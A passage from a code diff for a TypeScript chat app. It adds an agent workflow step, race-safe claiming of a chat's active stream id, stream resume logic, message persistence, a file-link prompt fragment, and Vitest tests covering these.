`runAgentStep`. + * + * Currently runs a SINGLE `runAgentStep` turn. A multi-turn agent loop is + * unsafe today: each iteration would re-send the original prompt without + * the assistant's tool-call response in scope, so a `tool-calls` finish + * reason would loop forever on the same input. The proper multi-turn + * shape (where the step appends its response to `messages` before the + * next iteration) lands with the sandbox-tool port in PR 4. + * + * Until then, if the model returns `tool-calls` we log a warning and exit + * — the client receives the partial tool-call chunks but no follow-up turn. + * + * WDK constraints honored: + * - All I/O (streamText, fetches) lives in `"use step"` functions. + * - The workflow body only orchestrates — no fetch / setTimeout / fs / crypto. + */ +export async function runAgentWorkflow(input: RunAgentWorkflowInput): Promise { + "use workflow"; + + console.log("[runAgentWorkflow] start", { + chatId: input.chatId, + sessionId: input.sessionId, + modelId: input.modelId, + }); + + const writable = getWritable(); + const result = await runAgentStep({ + messages: input.messages, + modelId: input.modelId, + writable, + }); + + if (result.finishReason === "tool-calls") { + console.warn( + "[runAgentWorkflow] model returned tool-calls but tool execution is not wired yet; exiting after 1 turn", + { chatId: input.chatId }, + ); + } else { + console.log("[runAgentWorkflow] finish", { finishReason: result.finishReason }); + } +} diff --git a/lib/chat/__tests__/compareAndSetChatActiveStreamId.test.ts b/lib/chat/__tests__/compareAndSetChatActiveStreamId.test.ts new file mode 100644 index 000000000..af22bd363 --- /dev/null +++ b/lib/chat/__tests__/compareAndSetChatActiveStreamId.test.ts @@ -0,0 +1,51 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { compareAndSetChatActiveStreamId } from "@/lib/chat/compareAndSetChatActiveStreamId"; +import { updateChat } from "@/lib/supabase/chats/updateChat"; + +vi.mock("@/lib/supabase/chats/updateChat", () => ({ + updateChat: vi.fn(), +})); + +beforeEach(() => vi.clearAllMocks()); + +describe("compareAndSetChatActiveStreamId", () => { + it("returns ok:true claimed:true when the row predicate matches and is updated", async () => { + vi.mocked(updateChat).mockResolvedValue({ ok: true, rowsUpdated: 1, row: null }); + const result = await compareAndSetChatActiveStreamId("chat-1", null, "wrun_x"); + expect(result).toEqual({ ok: true, claimed: true }); + expect(updateChat).toHaveBeenCalledWith( + { id: "chat-1", where: { active_stream_id: null } }, + { active_stream_id: "wrun_x" }, + ); + }); + + it("returns ok:true claimed:false when the predicate matches no rows (race lost)", async () => { + vi.mocked(updateChat).mockResolvedValue({ ok: true, rowsUpdated: 0, row: null }); + const result = await compareAndSetChatActiveStreamId("chat-1", null, "wrun_x"); + expect(result).toEqual({ ok: true, claimed: false }); + }); + + it("returns ok:false with the underlying error on DB failure (distinct from race lost)", async () => { + vi.mocked(updateChat).mockResolvedValue({ ok: false, error: "down" }); + const result = await compareAndSetChatActiveStreamId("chat-1", null, "wrun_x"); + expect(result).toEqual({ ok: false, error: "down" }); + }); + + it("supports expecting a specific run id (placeholder → real promotion)", async () => { + vi.mocked(updateChat).mockResolvedValue({ ok: true, rowsUpdated: 1, row: null }); + await compareAndSetChatActiveStreamId("chat-1", "pending-abc", "wrun_real"); + expect(updateChat).toHaveBeenCalledWith( + { id: "chat-1", where: { active_stream_id: "pending-abc" } }, + { active_stream_id: "wrun_real" }, + ); + }); + + it("supports next=null (releasing the slot)", async () => { + vi.mocked(updateChat).mockResolvedValue({ ok: true, rowsUpdated: 1, row: null }); + await compareAndSetChatActiveStreamId("chat-1", "wrun_old", null); + expect(updateChat).toHaveBeenCalledWith( + { id: "chat-1", where: { active_stream_id: "wrun_old" } }, + { active_stream_id: null }, + ); + }); +}); diff --git a/lib/chat/__tests__/handleChatWorkflowStream.test.ts b/lib/chat/__tests__/handleChatWorkflowStream.test.ts index c61911be8..fb3b434f1 100644 --- a/lib/chat/__tests__/handleChatWorkflowStream.test.ts +++ b/lib/chat/__tests__/handleChatWorkflowStream.test.ts @@ -6,22 +6,38 @@ import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow"; import { selectSessions } from "@/lib/supabase/sessions/selectSessions"; import { selectChats } from "@/lib/supabase/chats/selectChats"; import { isSandboxActive } from "@/lib/sandbox/isSandboxActive"; +import { updateSession } from "@/lib/supabase/sessions/updateSession"; +import { compareAndSetChatActiveStreamId } from "@/lib/chat/compareAndSetChatActiveStreamId"; +import { maybeResumeChatStream } from "@/lib/chat/maybeResumeChatStream"; +import { persistLatestUserMessage } from "@/lib/chat/persistLatestUserMessage"; +import { start, getRun } from "workflow/api"; -vi.mock("@/lib/chat/validateChatWorkflow", () => ({ - validateChatWorkflow: vi.fn(), +vi.mock("@/lib/chat/validateChatWorkflow", () => ({ validateChatWorkflow: vi.fn() })); +vi.mock("@/lib/supabase/sessions/selectSessions", () => ({ selectSessions: vi.fn() })); +vi.mock("@/lib/supabase/chats/selectChats", () => ({ selectChats: vi.fn() })); +vi.mock("@/lib/chat/compareAndSetChatActiveStreamId", () => ({ + compareAndSetChatActiveStreamId: vi.fn(), })); -vi.mock("@/lib/supabase/sessions/selectSessions", () => ({ - selectSessions: vi.fn(), +vi.mock("@/lib/sandbox/isSandboxActive", () => ({ isSandboxActive: vi.fn() })); +vi.mock("@/lib/supabase/sessions/updateSession", () => ({ updateSession: vi.fn() })); +vi.mock("@/lib/sandbox/buildActiveLifecycleUpdate", () => ({ + buildActiveLifecycleUpdate: vi.fn(() => ({})), })); -vi.mock("@/lib/supabase/chats/selectChats", () => ({ - selectChats: vi.fn(), +vi.mock("@/lib/chat/maybeResumeChatStream", () => ({ + maybeResumeChatStream: vi.fn(), })); -vi.mock("@/lib/sandbox/isSandboxActive", () => ({ - isSandboxActive: vi.fn(), +vi.mock("@/lib/chat/persistLatestUserMessage", () => ({ + persistLatestUserMessage: vi.fn(), })); +vi.mock("workflow/api", () => ({ + start: vi.fn(), + getRun: vi.fn(), +})); +vi.mock("@/app/lib/workflows/runAgentWorkflow", () => ({ runAgentWorkflow: vi.fn() })); vi.mock("@/lib/networking/getCorsHeaders", () => ({ getCorsHeaders: vi.fn(() => ({ "Access-Control-Allow-Origin": "*" })), })); +vi.mock("@/lib/uuid/generateUUID", () => ({ default: vi.fn(() => "deterministic-uuid") })); const ACCOUNT_ID = "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa"; const OTHER_ACCOUNT_ID = "bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb"; @@ -36,130 +52,275 @@ function makeRequest(): NextRequest { }); } -function mockValidatedRequest(overrides: Partial<{ accountId: string }> = {}) { +function mockValidated() { vi.mocked(validateChatWorkflow).mockResolvedValue({ messages: [], chatId: CHAT_ID, sessionId: SESSION_ID, - accountId: overrides.accountId ?? ACCOUNT_ID, + accountId: ACCOUNT_ID, orgId: null, authToken: "test-key", }); } -function mockOwnedSessionWithActiveSandbox() { - mockValidatedRequest(); +function mockSessionOwnedActive(extra: Record = {}) { vi.mocked(selectSessions).mockResolvedValue([ - { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never, + { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true }, ...extra } as never, ]); - vi.mocked(selectChats).mockResolvedValue([{ id: CHAT_ID, session_id: SESSION_ID } as never]); vi.mocked(isSandboxActive).mockReturnValue(true); } -describe("handleChatWorkflowStream (stub)", () => { - beforeEach(() => { - vi.clearAllMocks(); +function mockChatOwned(extra: Record = {}) { + vi.mocked(selectChats).mockResolvedValue([ + { + id: CHAT_ID, + session_id: SESSION_ID, + active_stream_id: null, + model_id: null, + ...extra, + } as never, + ]); +} + +function mockStartedRun(runId = "wrun_test_run_1") { + const stream = new ReadableStream({ + start(controller) { + controller.enqueue({ type: "text-start", id: "a" }); + controller.close(); + }, }); + vi.mocked(start).mockResolvedValue({ runId, getReadable: () => stream } as never); + vi.mocked(getRun).mockReturnValue({ cancel: vi.fn(() => Promise.resolve()) } as never); + return { runId, stream }; +} + +beforeEach(() => { + vi.clearAllMocks(); + // Default: maybeResumeChatStream returns null (no resume / no active stream) + vi.mocked(maybeResumeChatStream).mockResolvedValue(null); +}); - describe("validation short-circuits", () => { - it("returns the validator's short-circuit response unchanged (e.g. 401)", async () => { - const authError = NextResponse.json( - { status: "error", error: "Unauthorized" }, - { status: 401 }, +describe("handleChatWorkflowStream", () => { + describe("short-circuit responses", () => { + it("passes through the validator's response (401/400)", async () => { + vi.mocked(validateChatWorkflow).mockResolvedValue( + NextResponse.json({ status: "error", error: "Unauthorized" }, { status: 401 }), ); - vi.mocked(validateChatWorkflow).mockResolvedValue(authError); const res = await handleChatWorkflowStream(makeRequest()); expect(res.status).toBe(401); + expect(start).not.toHaveBeenCalled(); }); - it("returns the validator's 400 unchanged (e.g. invalid body)", async () => { - const badBody = NextResponse.json( - { status: "error", error: "Invalid JSON body" }, - { status: 400 }, - ); - vi.mocked(validateChatWorkflow).mockResolvedValue(badBody); + it("returns 500 when selectSessions errors", async () => { + mockValidated(); + vi.mocked(selectSessions).mockResolvedValue(null); const res = await handleChatWorkflowStream(makeRequest()); - expect(res.status).toBe(400); + expect(res.status).toBe(500); }); - }); - describe("session / chat ownership", () => { - beforeEach(() => mockValidatedRequest()); - - it("returns 404 when the session does not exist", async () => { + it("returns 404 when session does not exist", async () => { + mockValidated(); vi.mocked(selectSessions).mockResolvedValue([]); const res = await handleChatWorkflowStream(makeRequest()); expect(res.status).toBe(404); }); - it("returns 500 when selectSessions errors (returns null)", async () => { - vi.mocked(selectSessions).mockResolvedValue(null); - const res = await handleChatWorkflowStream(makeRequest()); - expect(res.status).toBe(500); - }); - - it("returns 403 when the session is owned by a different account", async () => { + it("returns 403 when session not owned", async () => { + mockValidated(); vi.mocked(selectSessions).mockResolvedValue([ - { id: SESSION_ID, account_id: OTHER_ACCOUNT_ID, sandbox_state: { ready: true } } as never, + { id: SESSION_ID, account_id: OTHER_ACCOUNT_ID, sandbox_state: {} } as never, ]); const res = await handleChatWorkflowStream(makeRequest()); expect(res.status).toBe(403); }); - it("returns 400 'Sandbox not initialized' when sandbox is inactive", async () => { + it("returns 400 when sandbox is inactive", async () => { + mockValidated(); vi.mocked(selectSessions).mockResolvedValue([ { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: null } as never, ]); vi.mocked(isSandboxActive).mockReturnValue(false); const res = await handleChatWorkflowStream(makeRequest()); expect(res.status).toBe(400); - const body = await res.json(); - expect(body.error).toMatch(/sandbox/i); }); - it("returns 404 when the chat does not exist", async () => { - vi.mocked(selectSessions).mockResolvedValue([ - { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never, - ]); - vi.mocked(isSandboxActive).mockReturnValue(true); + it("returns 404 when chat does not exist", async () => { + mockValidated(); + mockSessionOwnedActive(); vi.mocked(selectChats).mockResolvedValue([]); const res = await handleChatWorkflowStream(makeRequest()); expect(res.status).toBe(404); }); + }); - it("returns 404 when chat exists but belongs to a different session", async () => { - vi.mocked(selectSessions).mockResolvedValue([ - { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never, - ]); - vi.mocked(isSandboxActive).mockReturnValue(true); - vi.mocked(selectChats).mockResolvedValue([ - { id: CHAT_ID, session_id: "different-session" } as never, - ]); + describe("resume / conflict via maybeResumeChatStream", () => { + beforeEach(() => { + mockValidated(); + mockSessionOwnedActive(); + mockChatOwned({ active_stream_id: "wrun_existing" }); + }); + + it("returns the resume response when maybeResumeChatStream yields one", async () => { + const resumeResponse = new Response("ok", { + status: 200, + headers: { "x-workflow-run-id": "wrun_existing" }, + }); + vi.mocked(maybeResumeChatStream).mockResolvedValue(resumeResponse); const res = await handleChatWorkflowStream(makeRequest()); - expect(res.status).toBe(404); + expect(res.headers.get("x-workflow-run-id")).toBe("wrun_existing"); + expect(start).not.toHaveBeenCalled(); + }); + + it("returns the conflict response when maybeResumeChatStream yields 409", async () => { + const conflict = NextResponse.json({ status: "error", error: "conflict" }, { status: 409 }); + vi.mocked(maybeResumeChatStream).mockResolvedValue(conflict); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(409); + expect(start).not.toHaveBeenCalled(); }); }); - describe("success (stub response)", () => { - beforeEach(() => mockOwnedSessionWithActiveSandbox()); + describe("placeholder CAS before start", () => { + beforeEach(() => { + mockValidated(); + mockSessionOwnedActive(); + mockChatOwned(); + }); + + it("returns 500 when the placeholder-CAS hits a DB error", async () => { + vi.mocked(compareAndSetChatActiveStreamId).mockResolvedValueOnce({ + ok: false, + error: "down", + }); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(500); + expect(start).not.toHaveBeenCalled(); + }); - it("returns 200 with text/event-stream content type", async () => { + it("returns 409 (without calling start) when the placeholder-CAS loses the race", async () => { + vi.mocked(compareAndSetChatActiveStreamId).mockResolvedValueOnce({ + ok: true, + claimed: false, + }); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(409); + expect(start).not.toHaveBeenCalled(); + }); + + it("starts the workflow only after placeholder CAS succeeds", async () => { + // First CAS = placeholder claim, second CAS = promote placeholder → real run id + vi.mocked(compareAndSetChatActiveStreamId) + .mockResolvedValueOnce({ ok: true, claimed: true }) + .mockResolvedValueOnce({ ok: true, claimed: true }); + mockStartedRun(); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(200); + expect(start).toHaveBeenCalled(); + // Confirm CAS-before-start ordering — first CAS pre-claims with expected=null + const firstCallArgs = vi.mocked(compareAndSetChatActiveStreamId).mock.calls[0]; + expect(firstCallArgs?.[0]).toBe(CHAT_ID); + expect(firstCallArgs?.[1]).toBeNull(); + expect(firstCallArgs?.[2]).toMatch(/^pending-/); + }); + }); + + describe("happy path", () => { + beforeEach(() => { + mockValidated(); + mockSessionOwnedActive(); + mockChatOwned(); + vi.mocked(compareAndSetChatActiveStreamId) + .mockResolvedValueOnce({ ok: true, claimed: true }) + .mockResolvedValueOnce({ ok: true, claimed: true }); + }); + + it("returns 200 with text/event-stream and x-workflow-run-id", async () => { + const { runId } = mockStartedRun("wrun_abc_123"); const res = await handleChatWorkflowStream(makeRequest()); expect(res.status).toBe(200); expect(res.headers.get("content-type") ?? "").toMatch(/text\/event-stream/); + expect(res.headers.get("x-workflow-run-id")).toBe(runId); + }); + + it("refreshes session lifecycle activity", async () => { + mockStartedRun(); + await handleChatWorkflowStream(makeRequest()); + expect(updateSession).toHaveBeenCalledWith(SESSION_ID, expect.any(Object)); + }); + + it("fire-and-forgets persistLatestUserMessage", async () => { + mockStartedRun(); + await handleChatWorkflowStream(makeRequest()); + expect(persistLatestUserMessage).toHaveBeenCalledWith(CHAT_ID, []); + }); + + it("passes chat.model_id into the workflow when set", async () => { + vi.mocked(selectChats).mockResolvedValue([ + { + id: CHAT_ID, + session_id: SESSION_ID, + active_stream_id: null, + model_id: "anthropic/claude-opus-4.6", + } as never, + ]); + mockStartedRun(); + await handleChatWorkflowStream(makeRequest()); + const startArgs = vi.mocked(start).mock.calls[0]?.[1]?.[0] as { modelId: string }; + expect(startArgs.modelId).toBe("anthropic/claude-opus-4.6"); + }); + + it("falls back to the default model when chat.model_id is null", async () => { + mockStartedRun(); + await handleChatWorkflowStream(makeRequest()); + const startArgs = vi.mocked(start).mock.calls[0]?.[1]?.[0] as { modelId: string }; + expect(startArgs.modelId).toBe("anthropic/claude-haiku-4.5"); + }); + }); + + describe("promote placeholder → run id", () => { + beforeEach(() => { + mockValidated(); + mockSessionOwnedActive(); + mockChatOwned(); }); - it("sets an x-workflow-run-id response header starting with stub-", async () => { + it("awaits cancel() and returns 409 if promote loses", async () => { + vi.mocked(compareAndSetChatActiveStreamId) + .mockResolvedValueOnce({ ok: true, claimed: true }) // claim ok + .mockResolvedValueOnce({ ok: true, claimed: false }); // promote raced + const cancel = vi.fn(() => Promise.resolve()); + vi.mocked(start).mockResolvedValue({ + runId: "wrun_lost", + getReadable: () => new ReadableStream(), + } as never); + vi.mocked(getRun).mockReturnValue({ cancel } as never); const res = await handleChatWorkflowStream(makeRequest()); - const runId = res.headers.get("x-workflow-run-id"); - expect(runId).toBeTruthy(); - expect(runId!.startsWith("stub-")).toBe(true); + expect(res.status).toBe(409); + expect(getRun).toHaveBeenCalledWith("wrun_lost"); + expect(cancel).toHaveBeenCalled(); }); - it("emits a stream body that includes the stub assistant text", async () => { + it("still returns 409 if cancel() throws (best-effort)", async () => { + vi.mocked(compareAndSetChatActiveStreamId) + .mockResolvedValueOnce({ ok: true, claimed: true }) + .mockResolvedValueOnce({ ok: true, claimed: false }); + vi.mocked(start).mockResolvedValue({ + runId: "wrun_lost", + getReadable: () => new ReadableStream(), + } as never); + // Wrap rejection in an async IIFE + attach a noop handler so Vitest's + // unhandled-rejection watcher doesn't fire before the SUT awaits. + const cancelRejection = (async () => { + throw new Error("cancel exploded"); + })(); + cancelRejection.catch(() => { + /* SUT will await this and convert to logged catch */ + }); + vi.mocked(getRun).mockReturnValue({ + cancel: vi.fn(() => cancelRejection), + } as never); const res = await handleChatWorkflowStream(makeRequest()); - const text = await res.text(); - expect(text).toContain("Hello from /api/chat/workflow"); + expect(res.status).toBe(409); }); }); }); diff --git a/lib/chat/__tests__/maybeResumeChatStream.test.ts b/lib/chat/__tests__/maybeResumeChatStream.test.ts new file mode 100644 index 000000000..999c29d24 --- /dev/null +++ b/lib/chat/__tests__/maybeResumeChatStream.test.ts @@ -0,0 +1,46 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { maybeResumeChatStream } from "@/lib/chat/maybeResumeChatStream"; +import { reconcileExistingActiveStream } from "@/lib/chat/reconcileExistingActiveStream"; + +vi.mock("@/lib/chat/reconcileExistingActiveStream", () => ({ + reconcileExistingActiveStream: vi.fn(), +})); +vi.mock("@/lib/networking/getCorsHeaders", () => ({ + getCorsHeaders: vi.fn(() => ({ "Access-Control-Allow-Origin": "*" })), +})); + +beforeEach(() => vi.clearAllMocks()); + +describe("maybeResumeChatStream", () => { + it("returns null when there is no active_stream_id", async () => { + const res = await maybeResumeChatStream("chat-1", null); + expect(res).toBeNull(); + expect(reconcileExistingActiveStream).not.toHaveBeenCalled(); + }); + + it("returns null when reconcile says action=ready", async () => { + vi.mocked(reconcileExistingActiveStream).mockResolvedValue({ action: "ready" }); + const res = await maybeResumeChatStream("chat-1", "wrun_dead"); + expect(res).toBeNull(); + }); + + it("returns a 200 SSE response with x-workflow-run-id on resume", async () => { + const stream = new ReadableStream(); + vi.mocked(reconcileExistingActiveStream).mockResolvedValue({ + action: "resume", + runId: "wrun_live", + stream, + }); + const res = await maybeResumeChatStream("chat-1", "wrun_live"); + expect(res).not.toBeNull(); + expect(res!.status).toBe(200); + expect(res!.headers.get("x-workflow-run-id")).toBe("wrun_live"); + expect(res!.headers.get("content-type") ?? "").toMatch(/text\/event-stream/); + }); + + it("returns a 409 on conflict", async () => { + vi.mocked(reconcileExistingActiveStream).mockResolvedValue({ action: "conflict" }); + const res = await maybeResumeChatStream("chat-1", "wrun_x"); + expect(res!.status).toBe(409); + }); +}); diff --git a/lib/chat/__tests__/persistLatestUserMessage.test.ts b/lib/chat/__tests__/persistLatestUserMessage.test.ts new file mode 100644 index 000000000..28d4f7650 --- /dev/null +++ b/lib/chat/__tests__/persistLatestUserMessage.test.ts @@ -0,0 +1,129 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { persistLatestUserMessage } from "@/lib/chat/persistLatestUserMessage"; + +import { upsertChatMessage } from "@/lib/supabase/chat_messages/upsertChatMessage"; +import { selectChatMessages } from "@/lib/supabase/chat_messages/selectChatMessages"; +import { updateChat } from "@/lib/supabase/chats/updateChat"; + +vi.mock("@/lib/supabase/chat_messages/upsertChatMessage", () => ({ + upsertChatMessage: vi.fn(), +})); +vi.mock("@/lib/supabase/chat_messages/selectChatMessages", () => ({ + selectChatMessages: vi.fn(), +})); +vi.mock("@/lib/supabase/chats/updateChat", () => ({ + updateChat: vi.fn(), +})); + +const CHAT_ID = "chat-1"; +const MSG_ID = "msg-1"; + +function userMessage(text = "hello world", id = MSG_ID) { + return { id, role: "user" as const, parts: [{ type: "text" as const, text }] }; +} + +beforeEach(() => { + vi.clearAllMocks(); +}); + +describe("persistLatestUserMessage", () => { + it("no-ops when the last message is not a user message", async () => { + await persistLatestUserMessage(CHAT_ID, [{ id: "a", role: "assistant", parts: [] } as never]); + expect(upsertChatMessage).not.toHaveBeenCalled(); + expect(updateChat).not.toHaveBeenCalled(); + }); + + it("no-ops when messages array is empty", async () => { + await persistLatestUserMessage(CHAT_ID, []); + expect(upsertChatMessage).not.toHaveBeenCalled(); + }); + + it("bails on DB error (upsert ok:false) without touching the chat", async () => { + vi.mocked(upsertChatMessage).mockResolvedValue({ ok: false, error: "down" }); + await persistLatestUserMessage(CHAT_ID, [userMessage()]); + expect(updateChat).not.toHaveBeenCalled(); + }); + + it("bails on duplicate (already persisted) without touching the chat", async () => { + vi.mocked(upsertChatMessage).mockResolvedValue({ ok: true, row: null, isDuplicate: true }); + await persistLatestUserMessage(CHAT_ID, [userMessage()]); + expect(updateChat).not.toHaveBeenCalled(); + }); + + it("touches updated_at after a new insert", async () => { + vi.mocked(upsertChatMessage).mockResolvedValue({ + ok: true, + row: { id: MSG_ID } as never, + isDuplicate: false, + }); + vi.mocked(selectChatMessages).mockResolvedValue([{ id: "different-msg" } as never]); + await persistLatestUserMessage(CHAT_ID, [userMessage()]); + const firstCall = vi.mocked(updateChat).mock.calls[0]; + expect(firstCall?.[0]).toEqual({ id: CHAT_ID }); + expect(firstCall?.[1]).toMatchObject({ updated_at: expect.any(String) }); + }); + + it("sets chat.title when the inserted message is the earliest", async () => { + vi.mocked(upsertChatMessage).mockResolvedValue({ + ok: true, + row: { id: MSG_ID } as never, + isDuplicate: false, + }); + vi.mocked(selectChatMessages).mockResolvedValue([{ id: MSG_ID } as never]); + await persistLatestUserMessage(CHAT_ID, [userMessage("Hello there from a test")]); + const titleCall = vi + .mocked(updateChat) + .mock.calls.find(c => (c[1] as { title?: string }).title !== undefined); + expect(titleCall?.[1]).toEqual({ title: "Hello there from a test" }); + }); + + it("skips title when the inserted message is no longer the earliest", async () => { + vi.mocked(upsertChatMessage).mockResolvedValue({ + ok: true, + row: { id: MSG_ID } as never, + isDuplicate: false, + }); + vi.mocked(selectChatMessages).mockResolvedValue([{ id: "older-msg" } as never]); + await persistLatestUserMessage(CHAT_ID, [userMessage()]); + const titleCall = vi + .mocked(updateChat) + .mock.calls.find(c => (c[1] as { title?: string }).title !== undefined); + expect(titleCall).toBeUndefined(); + }); + + it("truncates titles to exactly TITLE_MAX_LENGTH including the suffix", async () => { + vi.mocked(upsertChatMessage).mockResolvedValue({ + ok: true, + row: { id: MSG_ID } as never, + isDuplicate: false, + }); + vi.mocked(selectChatMessages).mockResolvedValue([{ id: MSG_ID } as never]); + const long = "x".repeat(120); + await persistLatestUserMessage(CHAT_ID, [userMessage(long)]); + const titleCall = vi + .mocked(updateChat) + .mock.calls.find(c => (c[1] as { title?: string }).title !== undefined); + const title = (titleCall?.[1] as { title: string }).title; + expect(title.length).toBe(80); + expect(title.endsWith("…")).toBe(true); + }); + + it("bails on title-set when selectChatMessages errors (null)", async () => { + vi.mocked(upsertChatMessage).mockResolvedValue({ + ok: true, + row: { id: MSG_ID } as never, + isDuplicate: false, + }); + vi.mocked(selectChatMessages).mockResolvedValue(null); + await persistLatestUserMessage(CHAT_ID, [userMessage()]); + const titleCall = vi + .mocked(updateChat) + .mock.calls.find(c => (c[1] as { title?: string }).title !== undefined); + expect(titleCall).toBeUndefined(); + }); + + it("swallows thrown errors without escaping", async () => { + vi.mocked(upsertChatMessage).mockRejectedValue(new Error("boom")); + await expect(persistLatestUserMessage(CHAT_ID, [userMessage()])).resolves.toBeUndefined(); + }); +}); diff --git a/lib/chat/__tests__/reconcileExistingActiveStream.test.ts b/lib/chat/__tests__/reconcileExistingActiveStream.test.ts new file mode 100644 index 000000000..b40e12ce6 --- /dev/null +++ b/lib/chat/__tests__/reconcileExistingActiveStream.test.ts @@ -0,0 +1,92 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { reconcileExistingActiveStream } from "@/lib/chat/reconcileExistingActiveStream"; +import { getRun } from "workflow/api"; +import { compareAndSetChatActiveStreamId } from "@/lib/chat/compareAndSetChatActiveStreamId"; + +vi.mock("workflow/api", () => ({ + getRun: vi.fn(), +})); +vi.mock("@/lib/chat/compareAndSetChatActiveStreamId", () => ({ + compareAndSetChatActiveStreamId: vi.fn(), +})); + +const CHAT_ID = "chat-1"; +const RUN_ID = "wrun_test"; + +beforeEach(() => vi.clearAllMocks()); + +function mockRun(status: string, getReadable: () => ReadableStream = () => new ReadableStream()) { + vi.mocked(getRun).mockReturnValue({ + status: Promise.resolve(status), + getReadable, + } as never); +} + +describe("reconcileExistingActiveStream", () => { + it("returns action=resume when status is 'running'", async () => { + const stream = new ReadableStream(); + mockRun("running", () => stream); + const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID); + expect(result.action).toBe("resume"); + if (result.action !== "resume") return; + expect(result.runId).toBe(RUN_ID); + expect(result.stream).toBe(stream); + }); + + it("returns action=resume when status is 'pending'", async () => { + mockRun("pending"); + const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID); + expect(result.action).toBe("resume"); + }); + + it("returns action=ready after CASing a completed run's stale id to null", async () => { + mockRun("completed"); + vi.mocked(compareAndSetChatActiveStreamId).mockResolvedValue({ ok: true, claimed: true }); + const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID); + expect(result.action).toBe("ready"); + expect(compareAndSetChatActiveStreamId).toHaveBeenCalledWith(CHAT_ID, RUN_ID, null); + }); + + it("returns action=conflict when getRun throws (transient workflow API error)", async () => { + vi.mocked(getRun).mockImplementation(() => { + throw new Error("workflow API unreachable"); + }); + const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID); + expect(result.action).toBe("conflict"); + // Critical: we do NOT clear the stream id on transient error. + expect(compareAndSetChatActiveStreamId).not.toHaveBeenCalled(); + }); + + it("returns action=conflict when status promise rejects", async () => { + // Wrap in a thenable that defers the rejection so Vitest's + // unhandled-rejection watcher doesn't flag it before the code awaits. + const rejection: Promise = (async () => { + throw new Error("status fetch failed"); + })(); + rejection.catch(() => { + /* attach a handler so it's not 'unhandled' before the SUT awaits */ + }); + vi.mocked(getRun).mockReturnValue({ + status: rejection, + getReadable: () => new ReadableStream(), + } as never); + const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID); + expect(result.action).toBe("conflict"); + expect(compareAndSetChatActiveStreamId).not.toHaveBeenCalled(); + }); + + it("returns action=conflict when CAS-clear loses the race (claimed=false)", async () => { + mockRun("completed"); + vi.mocked(compareAndSetChatActiveStreamId).mockResolvedValue({ ok: true, claimed: false }); + const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID); + expect(result.action).toBe("conflict"); + }); + + it("returns action=conflict when CAS-clear hits a DB error (ok:false)", async () => { + mockRun("completed"); + vi.mocked(compareAndSetChatActiveStreamId).mockResolvedValue({ ok: false, error: "down" }); + const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID); + // P1 fix: a failed re-read after CAS no longer falls through to "ready". + expect(result.action).toBe("conflict"); + }); +}); diff --git a/lib/chat/agentCustomInstructions.ts b/lib/chat/agentCustomInstructions.ts new file mode 100644 index 000000000..0a3191ea7 --- /dev/null +++ b/lib/chat/agentCustomInstructions.ts @@ -0,0 +1,9 @@ +import { assistantFileLinkPrompt } from "@/lib/chat/assistantFileLinks"; +import { recoupApiSkillPrompt } from "@/lib/chat/recoupApiSkillPrompt"; + +/** + * Platform-wide agent instructions appended on every chat-workflow prompt. + * Combines individual prompt fragments here so the route and tests share one + * source of truth instead of re-joining the same strings in each place. + */ +export const agentCustomInstructions = [assistantFileLinkPrompt, recoupApiSkillPrompt].join("\n\n"); diff --git a/lib/chat/assistantFileLinks.ts b/lib/chat/assistantFileLinks.ts new file mode 100644 index 000000000..b5bd9280f --- /dev/null +++ b/lib/chat/assistantFileLinks.ts @@ -0,0 +1,28 @@ +const WORKSPACE_FILE_HREF_PREFIX = "#workspace-file="; + +function normalizeWorkspaceFilePath(filePath: string): string { + return filePath.replaceAll("\\", "/").trim(); +} + +/** + * Build the in-app deep link the chat UI uses to open a workspace file. + * + * @param filePath - Repo-relative file path (e.g. `src/index.ts`). + * @returns Href fragment prefixed with `#workspace-file=`. + */ +export function buildWorkspaceFileHref(filePath: string): string { + return `${WORKSPACE_FILE_HREF_PREFIX}${normalizeWorkspaceFilePath(filePath)}`; +} + +/** + * System prompt fragment telling the assistant how to render workspace + * file paths as clickable links inside chat messages. + */ +export const assistantFileLinkPrompt = [ + "When you mention a workspace file path in assistant text, render it as a markdown link using this exact format:", + `- \`[path/to/file.ts](${buildWorkspaceFileHref("path/to/file.ts")})\``, + "- Use the repo-relative file path as both the visible link text and the path inside the link.", + "- Whole-file links only for now. Do not include line numbers or ranges.", + "- Do not use this format for URLs or anything that is not a real workspace file path.", + "- If you are not sure of the exact file path, do not invent one.", +].join("\n"); diff --git a/lib/chat/compareAndSetChatActiveStreamId.ts b/lib/chat/compareAndSetChatActiveStreamId.ts new file mode 100644 index 000000000..b3b218245 --- /dev/null +++ b/lib/chat/compareAndSetChatActiveStreamId.ts @@ -0,0 +1,49 @@ +import { updateChat } from "@/lib/supabase/chats/updateChat"; + +/** + * Result of the CAS attempt. Forces callers to distinguish: + * + * - `{ ok: true, claimed: true }` — the row matched the expected value and + * was updated to `next`. + * - `{ ok: true, claimed: false }` — predicate didn't match (a race was + * lost OR the row's `active_stream_id` is in some other state). + * - `{ ok: false, error }` — Supabase / network failure. Distinct from + * "race lost" so callers don't return a misleading 409 when the DB is + * actually unhealthy. + */ +export type CasChatActiveStreamIdResult = + | { ok: true; claimed: boolean } + | { ok: false; error: string }; + +/** + * Atomically swap `chats.active_stream_id` from `expected` 